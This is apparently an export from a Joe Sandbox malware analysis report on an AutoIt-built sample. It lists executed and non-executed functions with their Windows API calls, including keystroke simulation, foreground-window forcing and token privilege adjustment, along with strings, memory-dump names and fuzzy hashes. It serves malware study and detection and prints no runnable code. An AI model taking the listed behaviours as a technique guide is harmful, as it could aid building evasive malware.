Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ce26cb10e272ce6ba75b3c33fe9d34acdb6c6eef18fbfb7d2eb1a570645197fc
Instruction ID: af239adb835c368ef37694daa2dc44003366295a28c41d04cb7571dbfc38948a
Opcode Fuzzy Hash: ce26cb10e272ce6ba75b3c33fe9d34acdb6c6eef18fbfb7d2eb1a570645197fc
Instruction Fuzzy Hash: 954127746047408FDB16DF24C494B1ABBE1FF46314F0988ACE8998B762C335EC45CB42

Function 003A7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A7BB3

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 643db5e663b5d88c7c2c15f39ba000ce3922fbda3777a432cbe4150c0e4f64e5
Instruction ID: 39c5af957ca771b4e3ff130746491f0afb9e12c575906fcd3d3855dced841373
Opcode Fuzzy Hash: 643db5e663b5d88c7c2c15f39ba000ce3922fbda3777a432cbe4150c0e4f64e5
Instruction Fuzzy Hash: B62124B2624A08EBDB169F21FC81B6D7FB8FB15351F21842EE446CA290EB30D4D0D719

Function 003A4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003A4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 003A4BEF

Part of subcall function 003C525B: __wfsopen.LIBCMT ref: 003C5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003A4E0F

Part of subcall function 003A4B6A: FreeLibrary.KERNEL32(00000000), ref: 003A4BA4

Part of subcall function 003A4C70: _memmove.LIBCMT ref: 003A4CBA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 6522d45e8e2aefd22b6c1cdad593474c95e0522efc463d055182c6dc0b1fe0e8
Instruction ID: 024c05a27ee63c126442117f4653a4bcd8b9a4828fba439038f7f46ef1cf560d
Opcode Fuzzy Hash: 6522d45e8e2aefd22b6c1cdad593474c95e0522efc463d055182c6dc0b1fe0e8
Instruction Fuzzy Hash: 7911E732600205ABCF12FF70D816F6D77A8EFC5710F10882DF541AF181DAF59905A761

Function 003DFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 003DFD91

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c5e87f9fd29f7919e08324754b2a58e9e47bc1995c3a1554786e5cb8e8bfc502
Instruction ID: 9ba578b3fe8aa9037778e12869ad8f4bf8583f6ae96bf1256521ae592bbfd91d
Opcode Fuzzy Hash: c5e87f9fd29f7919e08324754b2a58e9e47bc1995c3a1554786e5cb8e8bfc502
Instruction Fuzzy Hash: 05212471908741DFCB26DF64C444B1ABBE0BF89314F05896CE88A9B762D731F809CB92

Function 003C4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 003C48A6

Part of subcall function 003C8B28: __getptd_noexit.LIBCMT ref: 003C8B28

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: b10494cb8a782d2de5e31aa5c1d63182f0bdc1bdcf8fcf2a42b180e1b9642507
Instruction ID: 689482588caa9e3057629454e38897d2e462213856eaf6638904e15430d40e5a
Opcode Fuzzy Hash: b10494cb8a782d2de5e31aa5c1d63182f0bdc1bdcf8fcf2a42b180e1b9642507
Instruction Fuzzy Hash: F2F0AF31900709EBDF13AFA48C06FAE36A0AF10325F15841CF824DE191CB79CE51DB51

Function 003A4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003A4E7E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1eb1c88851f6c1d7bdc19924346c99635984ea6c54521dde50970a609486cfe0
Instruction ID: 73345d6b587ab348387707123221c199b4b437b6ba235d3375ebcee4573717d6
Opcode Fuzzy Hash: 1eb1c88851f6c1d7bdc19924346c99635984ea6c54521dde50970a609486cfe0
Instruction Fuzzy Hash: 1DF03071501711CFCB359F64D494C12B7F5FF96325311893EE1D682A10C7B19844DF40

Function 003C0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003C07B0

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 9126931cf99a296ade99e90c3c62758567c3b2b9d6a71e7e5b9464161bbc5ee6
Instruction ID: 22ff1161579715d3f755d909f15571b41a4a0ab75fbe582044e79bdb1405c5f4
Opcode Fuzzy Hash: 9126931cf99a296ade99e90c3c62758567c3b2b9d6a71e7e5b9464161bbc5ee6
Instruction Fuzzy Hash: 18E08677A0412857C72196A89C05FEA77ADDB896A0F0441B6FC08D7204D9619C8486E4

Function 00408E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00408EC1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: f40250503c4db1b7381ab9f6e0916d847e822477874ca112ad11a8f048170923
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: E2E092B0104B005BD7398A24D800BA373E1AB06304F00081DF2EAD3341EBA67841875D

Function 003C525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 003C5266

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 5b1e5e4dacb194fce61e74b792754186b4663896225786f58fb9966059699643
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: FBB0927644020C77CE022A82EC02F497B699B417A4F408020FB0C1C162A673AAA49A89

Function 0100F120 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0100F131

Memory Dump Source

Source File: 00000000.00000002.2056055672.000000000100C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0100C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100c000_n0nsAzvYNd.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 50666ffe619104ad64dcdff629d7bf244f1da907d21f24b98b3cddf726bc6a4a
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 6AE0E67494110EDFDB00EFB4D5496DE7FB4EF04301F100161FD01D2281D6309D509A62

Non-executed Functions

Function 0042CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0042CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CB95
GetWindowLongW.USER32(?,000000F0), ref: 0042CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0042CC00
SendMessageW.USER32 ref: 0042CC29
_wcsncpy.LIBCMT ref: 0042CC95
GetKeyState.USER32(00000011), ref: 0042CCB6
GetKeyState.USER32(00000009), ref: 0042CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CCD9
GetKeyState.USER32(00000010), ref: 0042CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0042CD0C
SendMessageW.USER32 ref: 0042CD33
SendMessageW.USER32(?,00001030,?,0042B348), ref: 0042CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0042CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0042CE60
SetCapture.USER32(?), ref: 0042CE69
ClientToScreen.USER32(?,?), ref: 0042CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0042CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0042CEF5
ReleaseCapture.USER32 ref: 0042CF00
GetCursorPos.USER32(?), ref: 0042CF3A
ScreenToClient.USER32(?,?), ref: 0042CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0042CFA3
SendMessageW.USER32 ref: 0042CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0042D00E
SendMessageW.USER32 ref: 0042D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0042D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0042D06D
GetCursorPos.USER32(?), ref: 0042D08D
ScreenToClient.USER32(?,?), ref: 0042D09A
GetParent.USER32(?), ref: 0042D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0042D123
SendMessageW.USER32 ref: 0042D154
ClientToScreen.USER32(?,?), ref: 0042D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0042D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0042D20C
SendMessageW.USER32 ref: 0042D22F
ClientToScreen.USER32(?,?), ref: 0042D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0042D2B5

Part of subcall function 003A25DB: GetWindowLongW.USER32(?,000000EB), ref: 003A25EC

GetWindowLongW.USER32(?,000000F0), ref: 0042D351

Strings

F, xrefs: 0042D235
@GUI_DRAGID, xrefs: 0042CE9C
pbF, xrefs: 0042CEAF

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbF
API String ID: 3977979337-2647924588
Opcode ID: 6c0283cbcb74aeed91c188c41796ef4aced3e6b4f05ef54fc81e21dff4ecf7d4
Instruction ID: 09964535c28fe8ec435ba9dcd95056572f196067611330ea2b3ca4eb8b8696cd
Opcode Fuzzy Hash: 6c0283cbcb74aeed91c188c41796ef4aced3e6b4f05ef54fc81e21dff4ecf7d4
Instruction Fuzzy Hash: 8F42DF38704290AFD720CF24E884EABBFE5FF49310F94052AF595872A0C775E855DB9A

Function 003B6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003B71C3
_memset.LIBCMT ref: 003B7539
_memmove.LIBCMT ref: 003B76AC

Strings

\b(?<=\w), xrefs: 003F3773
\b(?=\w), xrefs: 003F3769
P\E, xrefs: 003F1AB8
_;, xrefs: 003F23CB
[:>:]], xrefs: 003B7492
[:<:]], xrefs: 003B7479
]E, xrefs: 003F1A22
DEFINE, xrefs: 003F2103
Q\E, xrefs: 003B7FCB
3c;, xrefs: 003F23A0

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]E$3c;$DEFINE$P\E$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_;
API String ID: 1357608183-1997389693
Opcode ID: d96c426390239fc165636cab5be25812d902d12d8a7342cf97ad8587a608c249
Instruction ID: ca8c030c33773949f5ca91d99e8c194e2858981630eb5bf18c1ad4536891288b
Opcode Fuzzy Hash: d96c426390239fc165636cab5be25812d902d12d8a7342cf97ad8587a608c249
Instruction Fuzzy Hash: 7A93A375A00219DBDB26CF58D881BFDB7B1FF48314F25816AEA45AB781E7709E81CB40

Function 003A48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 003A48DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003DD665
IsIconic.USER32(?), ref: 003DD66E
ShowWindow.USER32(?,00000009), ref: 003DD67B
SetForegroundWindow.USER32(?), ref: 003DD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003DD69B
GetCurrentThreadId.KERNEL32 ref: 003DD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 003DD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 003DD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 003DD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 003DD6CF
SetForegroundWindow.USER32(?), ref: 003DD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 003DD6E7
keybd_event.USER32(00000012,00000000), ref: 003DD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 003DD6FC
keybd_event.USER32(00000012,00000000), ref: 003DD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 003DD70A
keybd_event.USER32(00000012,00000000), ref: 003DD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 003DD719
keybd_event.USER32(00000012,00000000), ref: 003DD71E
SetForegroundWindow.USER32(?), ref: 003DD721
AttachThreadInput.USER32(?,?,00000000), ref: 003DD748

Strings

Shell_TrayWnd, xrefs: 003DD660

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d2298a0f2c46c0ee489dd93ba9d78f5d7d42af5a97cfa180a01acea56cb19d76
Instruction ID: 9800a3f5b2f0562aa632c27495ee6626a743f3b9aa6ec571bba02e4b68d4c4d3
Opcode Fuzzy Hash: d2298a0f2c46c0ee489dd93ba9d78f5d7d42af5a97cfa180a01acea56cb19d76
Instruction Fuzzy Hash: 27318272B40318BAEB312F619C49F7F7E7CEB44B50F914076FA04EA1D1C6B05842AAA4

Function 003F8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 003F87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003F882B
Part of subcall function 003F87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003F8858
Part of subcall function 003F87E1: GetLastError.KERNEL32 ref: 003F8865

_memset.LIBCMT ref: 003F8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003F83A5
CloseHandle.KERNEL32(?), ref: 003F83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003F83CD
GetProcessWindowStation.USER32 ref: 003F83E6
SetProcessWindowStation.USER32(00000000), ref: 003F83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003F840A

Part of subcall function 003F81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003F8309), ref: 003F81E0
Part of subcall function 003F81CB: CloseHandle.KERNEL32(?,?,003F8309), ref: 003F81F2

Strings

default, xrefs: 003F8405
winsta0, xrefs: 003F83C8
, xrefs: 003F8362

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 2de1498d1ec59e9d6dd722f4f2825b3c776380554540bda61af9c73a3a9e8aee
Instruction ID: 9e519e4950f643e9ad5d9f7a50ac65bcacbd22c6af33c1d580be5c8a03418cbe
Opcode Fuzzy Hash: 2de1498d1ec59e9d6dd722f4f2825b3c776380554540bda61af9c73a3a9e8aee
Instruction Fuzzy Hash: F681787190020DAFDF269FA4CC45EFEBBB8EF09304F144169FA14A6261DB319E19DB24

Function 0040C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0040C78D
FindClose.KERNEL32(00000000), ref: 0040C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0040C844
__swprintf.LIBCMT ref: 0040C890
__swprintf.LIBCMT ref: 0040C8D3

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

__swprintf.LIBCMT ref: 0040C927

Part of subcall function 003C3698: __woutput_l.LIBCMT ref: 003C36F1

__swprintf.LIBCMT ref: 0040C975

Part of subcall function 003C3698: __flsbuf.LIBCMT ref: 003C3713
Part of subcall function 003C3698: __flsbuf.LIBCMT ref: 003C372B

__swprintf.LIBCMT ref: 0040C9C4
__swprintf.LIBCMT ref: 0040CA13
__swprintf.LIBCMT ref: 0040CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0040C88A
%4d, xrefs: 0040C8CD
%02d, xrefs: 0040C91B, 0040C925, 0040C973, 0040C9C2, 0040CA11, 0040CA60

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 3390e507788142ac23c7d52a2487c406c066130b3e4471dc08f1632d8822ed31
Instruction ID: 8440e8c62ae5a03be189015f2c8af6f58c95c58707dacf086c54812a9adeb2d7
Opcode Fuzzy Hash: 3390e507788142ac23c7d52a2487c406c066130b3e4471dc08f1632d8822ed31
Instruction Fuzzy Hash: E8A11EB2504304ABC711EF94C885EAFB7ECEF95700F40492EF585DA291EB35DA09CB62

Function 0040EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0040EFB6
_wcscmp.LIBCMT ref: 0040EFCB
_wcscmp.LIBCMT ref: 0040EFE2
GetFileAttributesW.KERNEL32(?), ref: 0040EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0040F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0040F026
FindClose.KERNEL32(00000000), ref: 0040F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0040F04D
_wcscmp.LIBCMT ref: 0040F074
_wcscmp.LIBCMT ref: 0040F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0040F09D
SetCurrentDirectoryW.KERNEL32(00458920), ref: 0040F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0040F0C5
FindClose.KERNEL32(00000000), ref: 0040F0D2
FindClose.KERNEL32(00000000), ref: 0040F0E4

Strings

*.*, xrefs: 0040F048

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: da5c59140b3cbf6cb33f36b8efe61f6d084c676fad550b5e80dbc8285742cf81
